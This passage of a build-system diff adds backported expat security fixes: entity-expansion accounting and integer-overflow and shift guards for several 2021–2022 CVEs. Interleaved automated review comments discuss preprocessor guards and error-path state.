++ entityTrackingOnClose(parser, entity, __LINE__);
+ entity->open = XML_FALSE;
+ if (! dtd->paramEntityRead)
+ dtd->keepProcessing = dtd->standalone;
+@@ -5530,9 +5818,12 @@ storeEntityValue(XML_Parser parser, const ENCODING *enc,
+ dtd->keepProcessing = dtd->standalone;
+ } else {
+ entity->open = XML_TRUE;
++ entityTrackingOnOpen(parser, entity, __LINE__);
+ result = storeEntityValue(
+- parser, parser->m_internalEncoding, (char *)entity->textPtr,
+- (char *)(entity->textPtr + entity->textLen));
++ parser, parser->m_internalEncoding, (const char *)entity->textPtr,
++ (const char *)(entity->textPtr + entity->textLen),
++ XML_ACCOUNT_ENTITY_EXPANSION);
++ entityTrackingOnClose(parser, entity, __LINE__);
+ entity->open = XML_FALSE;
+ if (result)
+ goto endEntityValue;
+@@ -6893,3 +7184,741 @@ copyString(const XML_Char *s, const XML_Memory_Handling_Suite *memsuite) {
+ memcpy(result, s, charsRequired * sizeof(XML_Char));
+ return result;
+ }
++
++#ifdef XML_DTD
++
++static float
++accountingGetCurrentAmplification(XML_Parser rootParser) {
++ const XmlBigCount countBytesOutput
++ = rootParser->m_accounting.countBytesDirect
++ + rootParser->m_accounting.countBytesIndirect;
++ const float amplificationFactor
++ = rootParser->m_accounting.countBytesDirect
++ ? (countBytesOutput
++ / (float)(rootParser->m_accounting.countBytesDirect))
++ : 1.0f;
++ assert(! rootParser->m_parentParser);
++ return amplificationFactor;
++}
++
++static void
++accountingReportStats(XML_Parser originParser, const char *epilog) {
++ const XML_Parser rootParser = getRootParserOf(originParser, NULL);
++ assert(! rootParser->m_parentParser);
++
++ if (rootParser->m_accounting.debugLevel < 1) {
++ return;
++ }
++
++ const float amplificationFactor
++ = accountingGetCurrentAmplification(rootParser);
++ fprintf(stderr,
++ "expat: Accounting(%p): Direct " EXPAT_FMT_ULL(
++ "10") ", indirect " EXPAT_FMT_ULL("10") ", amplification %8.2f%s",
++ (void *)rootParser, rootParser->m_accounting.countBytesDirect,
++ rootParser->m_accounting.countBytesIndirect,
++ (double)amplificationFactor, epilog);
++}
++
++static void
++accountingOnAbort(XML_Parser originParser) {
++ accountingReportStats(originParser, " ABORTING\n");
++}
++
++static void
++accountingReportDiff(XML_Parser rootParser,
++ unsigned int levelsAwayFromRootParser, const char *before,
++ const char *after, ptrdiff_t bytesMore, int source_line,
++ enum XML_Account account) {
++ assert(! rootParser->m_parentParser);
++
++ fprintf(stderr,
++ " (+" EXPAT_FMT_PTRDIFF_T("6") " bytes %s|%d, xmlparse.c:%d) %*s\"",
++ bytesMore, (account == XML_ACCOUNT_DIRECT) ? "DIR" : "EXP",
++ levelsAwayFromRootParser, source_line, 10, "");
++
++ const char ellipis[] = "[..]";
++ const size_t ellipsisLength = sizeof(ellipis) /* because compile-time */ - 1;
++ const unsigned int contextLength = 10;
++
++ /* Note: Performance is of no concern here */
++ const char *walker = before;
++ if ((rootParser->m_accounting.debugLevel >= 3)
++ || (after - before)
++ <= (ptrdiff_t)(contextLength + ellipsisLength + contextLength)) {
++ for (; walker < after; walker++) {
++ fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
++ }
++ } else {
++ for (; walker < before + contextLength; walker++) {
++ fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
++ }
++ fprintf(stderr, ellipis);
++ walker = after - contextLength;
++ for (; walker < after; walker++) {
++ fprintf(stderr, "%s", unsignedCharToPrintable(walker[0]));
++ }
++ }
++ fprintf(stderr, "\"\n");
++}
++
++static XML_Bool
++accountingDiffTolerated(XML_Parser originParser, int tok, const char *before,
++ const char *after, int source_line,
++ enum XML_Account account) {
++ /* Note: We need to check the token type *first* to be sure that
++ * we can even access variable <after>, safely.
++ * E.g. for XML_TOK_NONE <after> may hold an invalid pointer. */
++ switch (tok) {
++ case XML_TOK_INVALID:
++ case XML_TOK_PARTIAL:
++ case XML_TOK_PARTIAL_CHAR:
++ case XML_TOK_NONE:
++ return XML_TRUE;
++ }
++
++ if (account == XML_ACCOUNT_NONE)
++ return XML_TRUE; /* because these bytes have been accounted for, already */
++
++ unsigned int levelsAwayFromRootParser;
++ const XML_Parser rootParser
++ = getRootParserOf(originParser, &levelsAwayFromRootParser);
++ assert(! rootParser->m_parentParser);
++
++ const int isDirect
++ = (account == XML_ACCOUNT_DIRECT) && (originParser == rootParser);
++ const ptrdiff_t bytesMore = after - before;
++
++ XmlBigCount *const additionTarget
++ = isDirect ? &rootParser->m_accounting.countBytesDirect
++ : &rootParser->m_accounting.countBytesIndirect;
++
++ /* Detect and avoid integer overflow */
++ if (*additionTarget > (XmlBigCount)(-1) - (XmlBigCount)bytesMore)
++ return XML_FALSE;
++ *additionTarget += bytesMore;
++
++ const XmlBigCount countBytesOutput
++ = rootParser->m_accounting.countBytesDirect
++ + rootParser->m_accounting.countBytesIndirect;
++ const float amplificationFactor
++ = accountingGetCurrentAmplification(rootParser);
++ const XML_Bool tolerated
++ = (countBytesOutput < rootParser->m_accounting.activationThresholdBytes)
++ || (amplificationFactor
++ <= rootParser->m_accounting.maximumAmplificationFactor);
++
++ if (rootParser->m_accounting.debugLevel >= 2) {
++ accountingReportStats(rootParser, "");
++ accountingReportDiff(rootParser, levelsAwayFromRootParser, before, after,
++ bytesMore, source_line, account);
++ }
++
++ return tolerated;
++}
++
++static void
++entityTrackingReportStats(XML_Parser rootParser, ENTITY *entity,
++ const char *action, int sourceLine) {
++ assert(! rootParser->m_parentParser);
++ if (rootParser->m_entity_stats.debugLevel < 1)
++ return;
++
++# if defined(XML_UNICODE)
++ const char *const entityName = "[..]";
++# else
++ const char *const entityName = entity->name;
++# endif
++
++ fprintf(
++ stderr,
++ "expat: Entities(%p): Count %9d, depth %2d/%2d %*s%s%s; %s length %d (xmlparse.c:%d)\n",
++ (void *)rootParser, rootParser->m_entity_stats.countEverOpened,
++ rootParser->m_entity_stats.currentDepth,
++ rootParser->m_entity_stats.maximumDepthSeen,
++ (rootParser->m_entity_stats.currentDepth - 1) * 2, "",
++ entity->is_param ? "%" : "&", entityName, action, entity->textLen,
++ sourceLine);
++}
++
++static void
++entityTrackingOnOpen(XML_Parser originParser, ENTITY *entity, int sourceLine) {
++ const XML_Parser rootParser = getRootParserOf(originParser, NULL);
++ assert(! rootParser->m_parentParser);
++
++ rootParser->m_entity_stats.countEverOpened++;
++ rootParser->m_entity_stats.currentDepth++;
++ if (rootParser->m_entity_stats.currentDepth
++ > rootParser->m_entity_stats.maximumDepthSeen) {
++ rootParser->m_entity_stats.maximumDepthSeen++;
++ }
++
++ entityTrackingReportStats(rootParser, entity, "OPEN ", sourceLine);
++}
++
++static void
++entityTrackingOnClose(XML_Parser originParser, ENTITY *entity, int sourceLine) {
++ const XML_Parser rootParser = getRootParserOf(originParser, NULL);
++ assert(! rootParser->m_parentParser);
++
++ entityTrackingReportStats(rootParser, entity, "CLOSE", sourceLine);
++ rootParser->m_entity_stats.currentDepth--;
++}
++
++static XML_Parser
++getRootParserOf(XML_Parser parser, unsigned int *outLevelDiff) {
++ XML_Parser rootParser = parser;
++ unsigned int stepsTakenUpwards = 0;
++ while (rootParser->m_parentParser) {
++ rootParser = rootParser->m_parentParser;
++ stepsTakenUpwards++;
++ }
++ assert(! rootParser->m_parentParser);
++ if (outLevelDiff != NULL) {
++ *outLevelDiff = stepsTakenUpwards;
++ }
++ return rootParser;
++}
++
++static const char *
++unsignedCharToPrintable(unsigned char c) {
++ switch (c) {
++ case 0:
++ return "\\0";
++ case 1:
++ return "\\x1";
++ case 2:
++ return "\\x2";
++ case 3:
++ return "\\x3";
++ case 4:
++ return "\\x4";
++ case 5:
++ return "\\x5";
++ case 6:
++ return "\\x6";
++ case 7:
++ return "\\x7";
++ case 8:
++ return "\\x8";
++ case 9:
++ return "\\t";
++ case 10:
++ return "\\n";
++ case 11:
++ return "\\xB";
++ case 12:
++ return "\\xC";
++ case 13:
++ return "\\r";
++ case 14:
++ return "\\xE";
++ case 15:
++ return "\\xF";
++ case 16:
++ return "\\x10";
++ case 17:
++ return "\\x11";
++ case 18:
++ return "\\x12";
++ case 19:
++ return "\\x13";
++ case 20:
++ return "\\x14";
++ case 21:
++ return "\\x15";
++ case 22:
++ return "\\x16";
++ case 23:
++ return "\\x17";
++ case 24:
++ return "\\x18";
++ case 25:
++ return "\\x19";
++ case 26:
++ return "\\x1A";
++ case 27:
++ return "\\x1B";
++ case 28:
++ return "\\x1C";
++ case 29:
++ return "\\x1D";
++ case 30:
++ return "\\x1E";
++ case 31:
++ return "\\x1F";
++ case 32:
++ return " ";
++ case 33:
++ return "!";
++ case 34:
++ return "\\\"";
++ case 35:
++ return "#";
++ case 36:
++ return "$";
++ case 37:
++ return "%";
++ case 38:
++ return "&";
++ case 39:
++ return "'";
++ case 40:
++ return "(";
++ case 41:
++ return ")";
++ case 42:
++ return "*";
++ case 43:
++ return "+";
++ case 44:
++ return ",";
++ case 45:
++ return "-";
++ case 46:
++ return ".";
++ case 47:
++ return "/";
++ case 48:
++ return "0";
++ case 49:
++ return "1";
++ case 50:
++ return "2";
++ case 51:
++ return "3";
++ case 52:
++ return "4";
++ case 53:
++ return "5";
++ case 54:
++ return "6";
++ case 55:
++ return "7";
++ case 56:
++ return "8";
++ case 57:
++ return "9";
++ case 58:
++ return ":";
++ case 59:
++ return ";";
++ case 60:
++ return "<";
++ case 61:
++ return "=";
++ case 62:
++ return ">";
++ case 63:
++ return "?";
++ case 64:
++ return "@";
++ case 65:
++ return "A";
++ case 66:
++ return "B";
++ case 67:
++ return "C";
++ case 68:
++ return "D";
++ case 69:
++ return "E";
++ case 70:
++ return "F";
++ case 71:
++ return "G";
++ case 72:
++ return "H";
++ case 73:
++ return "I";
++ case 74:
++ return "J";
++ case 75:
++ return "K";
++ case 76:
++ return "L";
++ case 77:
++ return "M";
++ case 78:
++ return "N";
++ case 79:
++ return "O";
++ case 80:
++ return "P";
++ case 81:
++ return "Q";
++ case 82:
++ return "R";
++ case 83:
++ return "S";
++ case 84:
++ return "T";
++ case 85:
++ return "U";
++ case 86:
++ return "V";
++ case 87:
++ return "W";
++ case 88:
++ return "X";
++ case 89:
++ return "Y";
++ case 90:
++ return "Z";
++ case 91:
++ return "[";
++ case 92:
++ return "\\\\";
++ case 93:
++ return "]";
++ case 94:
++ return "^";
++ case 95:
++ return "_";
++ case 96:
++ return "`";
++ case 97:
++ return "a";
++ case 98:
++ return "b";
++ case 99:
++ return "c";
++ case 100:
++ return "d";
++ case 101:
++ return "e";
++ case 102:
++ return "f";
++ case 103:
++ return "g";
++ case 104:
++ return "h";
++ case 105:
++ return "i";
++ case 106:
++ return "j";
++ case 107:
++ return "k";
++ case 108:
++ return "l";
++ case 109:
++ return "m";
++ case 110:
++ return "n";
++ case 111:
++ return "o";
++ case 112:
++ return "p";
++ case 113:
++ return "q";
++ case 114:
++ return "r";
++ case 115:
++ return "s";
++ case 116:
++ return "t";
++ case 117:
++ return "u";
++ case 118:
++ return "v";
++ case 119:
++ return "w";
++ case 120:
++ return "x";
++ case 121:
++ return "y";
++ case 122:
++ return "z";
++ case 123:
++ return "{";
++ case 124:
++ return "|";
++ case 125:
++ return "}";
++ case 126:
++ return "~";
++ case 127:
++ return "\\x7F";
++ case 128:
++ return "\\x80";
++ case 129:
++ return "\\x81";
++ case 130:
++ return "\\x82";
++ case 131:
++ return "\\x83";
++ case 132:
++ return "\\x84";
++ case 133:
++ return "\\x85";
++ case 134:
++ return "\\x86";
++ case 135:
++ return "\\x87";
++ case 136:
++ return "\\x88";
++ case 137:
++ return "\\x89";
++ case 138:
++ return "\\x8A";
++ case 139:
++ return "\\x8B";
++ case 140:
++ return "\\x8C";
++ case 141:
++ return "\\x8D";
++ case 142:
++ return "\\x8E";
++ case 143:
++ return "\\x8F";
++ case 144:
++ return "\\x90";
++ case 145:
++ return "\\x91";
++ case 146:
++ return "\\x92";
++ case 147:
++ return "\\x93";
++ case 148:
++ return "\\x94";
++ case 149:
++ return "\\x95";
++ case 150:
++ return "\\x96";
++ case 151:
++ return "\\x97";
++ case 152:
++ return "\\x98";
++ case 153:
++ return "\\x99";
++ case 154:
++ return "\\x9A";
++ case 155:
++ return "\\x9B";
++ case 156:
++ return "\\x9C";
++ case 157:
++ return "\\x9D";
++ case 158:
++ return "\\x9E";
++ case 159:
++ return "\\x9F";
++ case 160:
++ return "\\xA0";
++ case 161:
++ return "\\xA1";
++ case 162:
++ return "\\xA2";
++ case 163:
++ return "\\xA3";
++ case 164:
++ return "\\xA4";
++ case 165:
++ return "\\xA5";
++ case 166:
++ return "\\xA6";
++ case 167:
++ return "\\xA7";
++ case 168:
++ return "\\xA8";
++ case 169:
++ return "\\xA9";
++ case 170:
++ return "\\xAA";
++ case 171:
++ return "\\xAB";
++ case 172:
++ return "\\xAC";
++ case 173:
++ return "\\xAD";
++ case 174:
++ return "\\xAE";
++ case 175:
++ return "\\xAF";
++ case 176:
++ return "\\xB0";
++ case 177:
++ return "\\xB1";
++ case 178:
++ return "\\xB2";
++ case 179:
++ return "\\xB3";
++ case 180:
++ return "\\xB4";
++ case 181:
++ return "\\xB5";
++ case 182:
++ return "\\xB6";
++ case 183:
++ return "\\xB7";
++ case 184:
++ return "\\xB8";
++ case 185:
++ return "\\xB9";
++ case 186:
++ return "\\xBA";
++ case 187:
++ return "\\xBB";
++ case 188:
++ return "\\xBC";
++ case 189:
++ return "\\xBD";
++ case 190:
++ return "\\xBE";
++ case 191:
++ return "\\xBF";
++ case 192:
++ return "\\xC0";
++ case 193:
++ return "\\xC1";
++ case 194:
++ return "\\xC2";
++ case 195:
++ return "\\xC3";
++ case 196:
++ return "\\xC4";
++ case 197:
++ return "\\xC5";
++ case 198:
++ return "\\xC6";
++ case 199:
++ return "\\xC7";
++ case 200:
++ return "\\xC8";
++ case 201:
++ return "\\xC9";
++ case 202:
++ return "\\xCA";
++ case 203:
++ return "\\xCB";
++ case 204:
++ return "\\xCC";
++ case 205:
++ return "\\xCD";
++ case 206:
++ return "\\xCE";
++ case 207:
++ return "\\xCF";
++ case 208:
++ return "\\xD0";
++ case 209:
++ return "\\xD1";
++ case 210:
++ return "\\xD2";
++ case 211:
++ return "\\xD3";
++ case 212:
++ return "\\xD4";
++ case 213:
++ return "\\xD5";
++ case 214:
++ return "\\xD6";
++ case 215:
++ return "\\xD7";
++ case 216:
++ return "\\xD8";
++ case 217:
++ return "\\xD9";
++ case 218:
++ return "\\xDA";
++ case 219:
++ return "\\xDB";
++ case 220:
++ return "\\xDC";
++ case 221:
++ return "\\xDD";
++ case 222:
++ return "\\xDE";
++ case 223:
++ return "\\xDF";
++ case 224:
++ return "\\xE0";
++ case 225:
++ return "\\xE1";
++ case 226:
++ return "\\xE2";
++ case 227:
++ return "\\xE3";
++ case 228:
++ return "\\xE4";
++ case 229:
++ return "\\xE5";
++ case 230:
++ return "\\xE6";
++ case 231:
++ return "\\xE7";
++ case 232:
++ return "\\xE8";
++ case 233:
++ return "\\xE9";
++ case 234:
++ return "\\xEA";
++ case 235:
++ return "\\xEB";
++ case 236:
++ return "\\xEC";
++ case 237:
++ return "\\xED";
++ case 238:
++ return "\\xEE";
++ case 239:
++ return "\\xEF";
++ case 240:
++ return "\\xF0";
++ case 241:
++ return "\\xF1";
++ case 242:
++ return "\\xF2";
++ case 243:
++ return "\\xF3";
++ case 244:
++ return "\\xF4";
++ case 245:
++ return "\\xF5";
++ case 246:
++ return "\\xF6";
++ case 247:
++ return "\\xF7";
++ case 248:
++ return "\\xF8";
++ case 249:
++ return "\\xF9";
++ case 250:
++ return "\\xFA";
++ case 251:
++ return "\\xFB";
++ case 252:
++ return "\\xFC";
++ case 253:
++ return "\\xFD";
++ case 254:
++ return "\\xFE";
++ case 255:
++ return "\\xFF";
++ default:
++ assert(0); /* never gets here */
++ return "dead code";
++ }
++ assert(0); /* never gets here */
++}
++
++#endif /* XML_DTD */
++
++static unsigned long
++getDebugLevel(const char *variableName, unsigned long defaultDebugLevel) {
++ const char *const valueOrNull = getenv(variableName);
++ if (valueOrNull == NULL) {
++ return defaultDebugLevel;
++ }
++ const char *const value = valueOrNull;
++
++ errno = 0;
++ char *afterValue = (char *)value;
++ unsigned long debugLevel = strtoul(value, &afterValue, 10);
++ if ((errno != 0) || (afterValue[0] != '\0')) {
++ errno = 0;
++ return defaultDebugLevel;
++ }
++
++ return debugLevel;
++}
+--
+2.32.0
+
diff --git a/meta/recipes-core/expat/expat/CVE-2021-45960.patch b/meta/recipes-core/expat/expat/CVE-2021-45960.patch
new file mode 100644
index 0000000000..523449e22c
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2021-45960.patch
@@ -0,0 +1,65 @@
+From 0adcb34c49bee5b19bd29b16a578c510c23597ea Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Mon, 27 Dec 2021 20:15:02 +0100
+Subject: [PATCH] lib: Detect and prevent troublesome left shifts in function
+ storeAtts (CVE-2021-45960)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/534/commits/0adcb34c49bee5b19bd29b16a578c510c23597ea
+
+CVE: CVE-2021-45960
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 31 +++++++++++++++++++++++++++++--
+ 1 file changed, 29 insertions(+), 2 deletions(-)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index d730f41c3..b47c31b05 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -3414,7 +3414,13 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ if (nPrefixes) {
+ int j; /* hash table index */
+ unsigned long version = parser->m_nsAttsVersion;
+- int nsAttsSize = (int)1 << parser->m_nsAttsPower;
++
++ /* Detect and prevent invalid shift */
++ if (parser->m_nsAttsPower >= sizeof(unsigned int) * 8 /* bits per byte */) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ unsigned int nsAttsSize = 1u << parser->m_nsAttsPower;
+ unsigned char oldNsAttsPower = parser->m_nsAttsPower;
+ /* size of hash table must be at least 2 * (# of prefixed attributes) */
+ if ((nPrefixes << 1)
+@@ -3425,7 +3431,28 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ ;
+ if (parser->m_nsAttsPower < 3)
+ parser->m_nsAttsPower = 3;
+- nsAttsSize = (int)1 << parser->m_nsAttsPower;
++
++ /* Detect and prevent invalid shift */
++ if (parser->m_nsAttsPower >= sizeof(nsAttsSize) * 8 /* bits per byte */) {
++ /* Restore actual size of memory in m_nsAtts */
++ parser->m_nsAttsPower = oldNsAttsPower;
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ nsAttsSize = 1u << parser->m_nsAttsPower;
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (nsAttsSize > (size_t)(-1) / sizeof(NS_ATT)) {
++ /* Restore actual size of memory in m_nsAtts */
++ parser->m_nsAttsPower = oldNsAttsPower;
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ temp = (NS_ATT *)REALLOC(parser, parser->m_nsAtts,
+ nsAttsSize * sizeof(NS_ATT));
+ if (! temp) {
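Review bot: The `#if UINT_MAX >= SIZE_MAX` guard around the `nsAttsSize > (size_t)(-1) / sizeof(NS_ATT)` check in the second storeAtts hunk only means what its comment says if both macros are defined at that point in xmlparse.c. An undefined `SIZE_MAX` evaluates as 0 in `#if`, which keeps the check compiled in (so it fails safe) but brings back the -Wtype-limits warning the comment describes. The includes are not visible in this patch, so when carrying the backport onto an older expat it is worth confirming that `<limits.h>` and `<stdint.h>` are in scope. The two shift guards also spell the width differently, `sizeof(unsigned int) * 8` and `sizeof(nsAttsSize) * 8`; `sizeof(unsigned int) * CHAR_BIT` in both would drop the magic number, though staying byte-identical to upstream may matter more for a backport. storeAtts starts and ends outside both hunks.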
diff --git a/meta/recipes-core/expat/expat/CVE-2021-46143.patch b/meta/recipes-core/expat/expat/CVE-2021-46143.patch
new file mode 100644
index 0000000000..b1a726d9a8
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2021-46143.patch
@@ -0,0 +1,49 @@
+From 85ae9a2d7d0e9358f356b33977b842df8ebaec2b Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 25 Dec 2021 20:52:08 +0100
+Subject: [PATCH] lib: Prevent integer overflow on m_groupSize in function
+ doProlog (CVE-2021-46143)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/538/commits/85ae9a2d7d0e9358f356b33977b842df8ebaec2b
+
+CVE: CVE-2021-46143
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ expat/lib/xmlparse.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index b47c31b0..8f243126 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -5046,6 +5046,11 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ if (parser->m_prologState.level >= parser->m_groupSize) {
+ if (parser->m_groupSize) {
+ {
++ /* Detect and prevent integer overflow */
++ if (parser->m_groupSize > (unsigned int)(-1) / 2u) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
+ char *const new_connector = (char *)REALLOC(
+ parser, parser->m_groupConnector, parser->m_groupSize *= 2);
+ if (new_connector == NULL) {
+@@ -5056,6 +5061,16 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ }
+
+ if (dtd->scaffIndex) {
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (parser->m_groupSize > (size_t)(-1) / sizeof(int)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ int *const new_scaff_index = (int *)REALLOC(
+ parser, dtd->scaffIndex, parser->m_groupSize * sizeof(int));
+ if (new_scaff_index == NULL)
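Review bot: The second added return in doProlog, inside `if (dtd->scaffIndex)`, runs after `parser->m_groupSize *= 2` has already taken effect in the REALLOC call above it, so it leaves m_groupSize doubled while dtd->scaffIndex keeps its old allocation. The storeAtts fix in CVE-2021-45960.patch on this page restores `m_nsAttsPower` before its error returns, whereas nothing is restored here. Whether that is safe depends on the parser not indexing scaffIndex again after the error, which these hunks do not show. A comment on the new return such as `/* m_groupSize is already doubled here; scaffIndex keeps its old size */` would record the assumption for whoever next touches this path. This check is only compiled where `UINT_MAX >= SIZE_MAX`, and doProlog's body continues outside both hunks.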
diff --git a/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch b/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch
new file mode 100644
index 0000000000..e569fbc7ab
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch
@@ -0,0 +1,257 @@
+From 9f93e8036e842329863bf20395b8fb8f73834d9e Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Thu, 30 Dec 2021 22:46:03 +0100
+Subject: [PATCH] lib: Prevent integer overflow at multiple places
+ (CVE-2022-22822 to CVE-2022-22827)
+
+The involved functions are:
+- addBinding (CVE-2022-22822)
+- build_model (CVE-2022-22823)
+- defineAttribute (CVE-2022-22824)
+- lookup (CVE-2022-22825)
+- nextScaffoldPart (CVE-2022-22826)
+- storeAtts (CVE-2022-22827)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/539/commits/9f93e8036e842329863bf20395b8fb8f73834d9e
+
+CVE: CVE-2022-22822 CVE-2022-22823 CVE-2022-22824 CVE-2022-22825 CVE-2022-22826 CVE-2022-22827
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 153 ++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 151 insertions(+), 2 deletions(-)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index 8f243126..575e73ee 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -3261,13 +3261,38 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+
+ /* get the attributes from the tokenizer */
+ n = XmlGetAttributes(enc, attStr, parser->m_attsSize, parser->m_atts);
++
++ /* Detect and prevent integer overflow */
++ if (n > INT_MAX - nDefaultAtts) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
+ if (n + nDefaultAtts > parser->m_attsSize) {
+ int oldAttsSize = parser->m_attsSize;
+ ATTRIBUTE *temp;
+ #ifdef XML_ATTR_INFO
+ XML_AttrInfo *temp2;
+ #endif
++
++ /* Detect and prevent integer overflow */
++ if ((nDefaultAtts > INT_MAX - INIT_ATTS_SIZE)
++ || (n > INT_MAX - (nDefaultAtts + INIT_ATTS_SIZE))) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
+ parser->m_attsSize = n + nDefaultAtts + INIT_ATTS_SIZE;
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(ATTRIBUTE)) {
++ parser->m_attsSize = oldAttsSize;
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ temp = (ATTRIBUTE *)REALLOC(parser, (void *)parser->m_atts,
+ parser->m_attsSize * sizeof(ATTRIBUTE));
+ if (temp == NULL) {
+@@ -3276,6 +3301,17 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ }
+ parser->m_atts = temp;
+ #ifdef XML_ATTR_INFO
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++# if UINT_MAX >= SIZE_MAX
++ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(XML_AttrInfo)) {
++ parser->m_attsSize = oldAttsSize;
++ return XML_ERROR_NO_MEMORY;
++ }
++# endif
++
+ temp2 = (XML_AttrInfo *)REALLOC(parser, (void *)parser->m_attInfo,
+ parser->m_attsSize * sizeof(XML_AttrInfo));
+ if (temp2 == NULL) {
+@@ -3610,9 +3646,31 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ tagNamePtr->prefixLen = prefixLen;
+ for (i = 0; localPart[i++];)
+ ; /* i includes null terminator */
++
++ /* Detect and prevent integer overflow */
++ if (binding->uriLen > INT_MAX - prefixLen
++ || i > INT_MAX - (binding->uriLen + prefixLen)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
+ n = i + binding->uriLen + prefixLen;
+ if (n > binding->uriAlloc) {
+ TAG *p;
++
++ /* Detect and prevent integer overflow */
++ if (n > INT_MAX - EXPAND_SPARE) {
++ return XML_ERROR_NO_MEMORY;
++ }
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)(n + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ uri = (XML_Char *)MALLOC(parser, (n + EXPAND_SPARE) * sizeof(XML_Char));
+ if (! uri)
+ return XML_ERROR_NO_MEMORY;
+@@ -3708,6 +3766,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+ if (parser->m_freeBindingList) {
+ b = parser->m_freeBindingList;
+ if (len > b->uriAlloc) {
++ /* Detect and prevent integer overflow */
++ if (len > INT_MAX - EXPAND_SPARE) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ XML_Char *temp = (XML_Char *)REALLOC(
+ parser, b->uri, sizeof(XML_Char) * (len + EXPAND_SPARE));
+ if (temp == NULL)
+@@ -3720,6 +3793,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+ b = (BINDING *)MALLOC(parser, sizeof(BINDING));
+ if (! b)
+ return XML_ERROR_NO_MEMORY;
++
++ /* Detect and prevent integer overflow */
++ if (len > INT_MAX - EXPAND_SPARE) {
++ return XML_ERROR_NO_MEMORY;
++ }
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ b->uri
+ = (XML_Char *)MALLOC(parser, sizeof(XML_Char) * (len + EXPAND_SPARE));
+ if (! b->uri) {
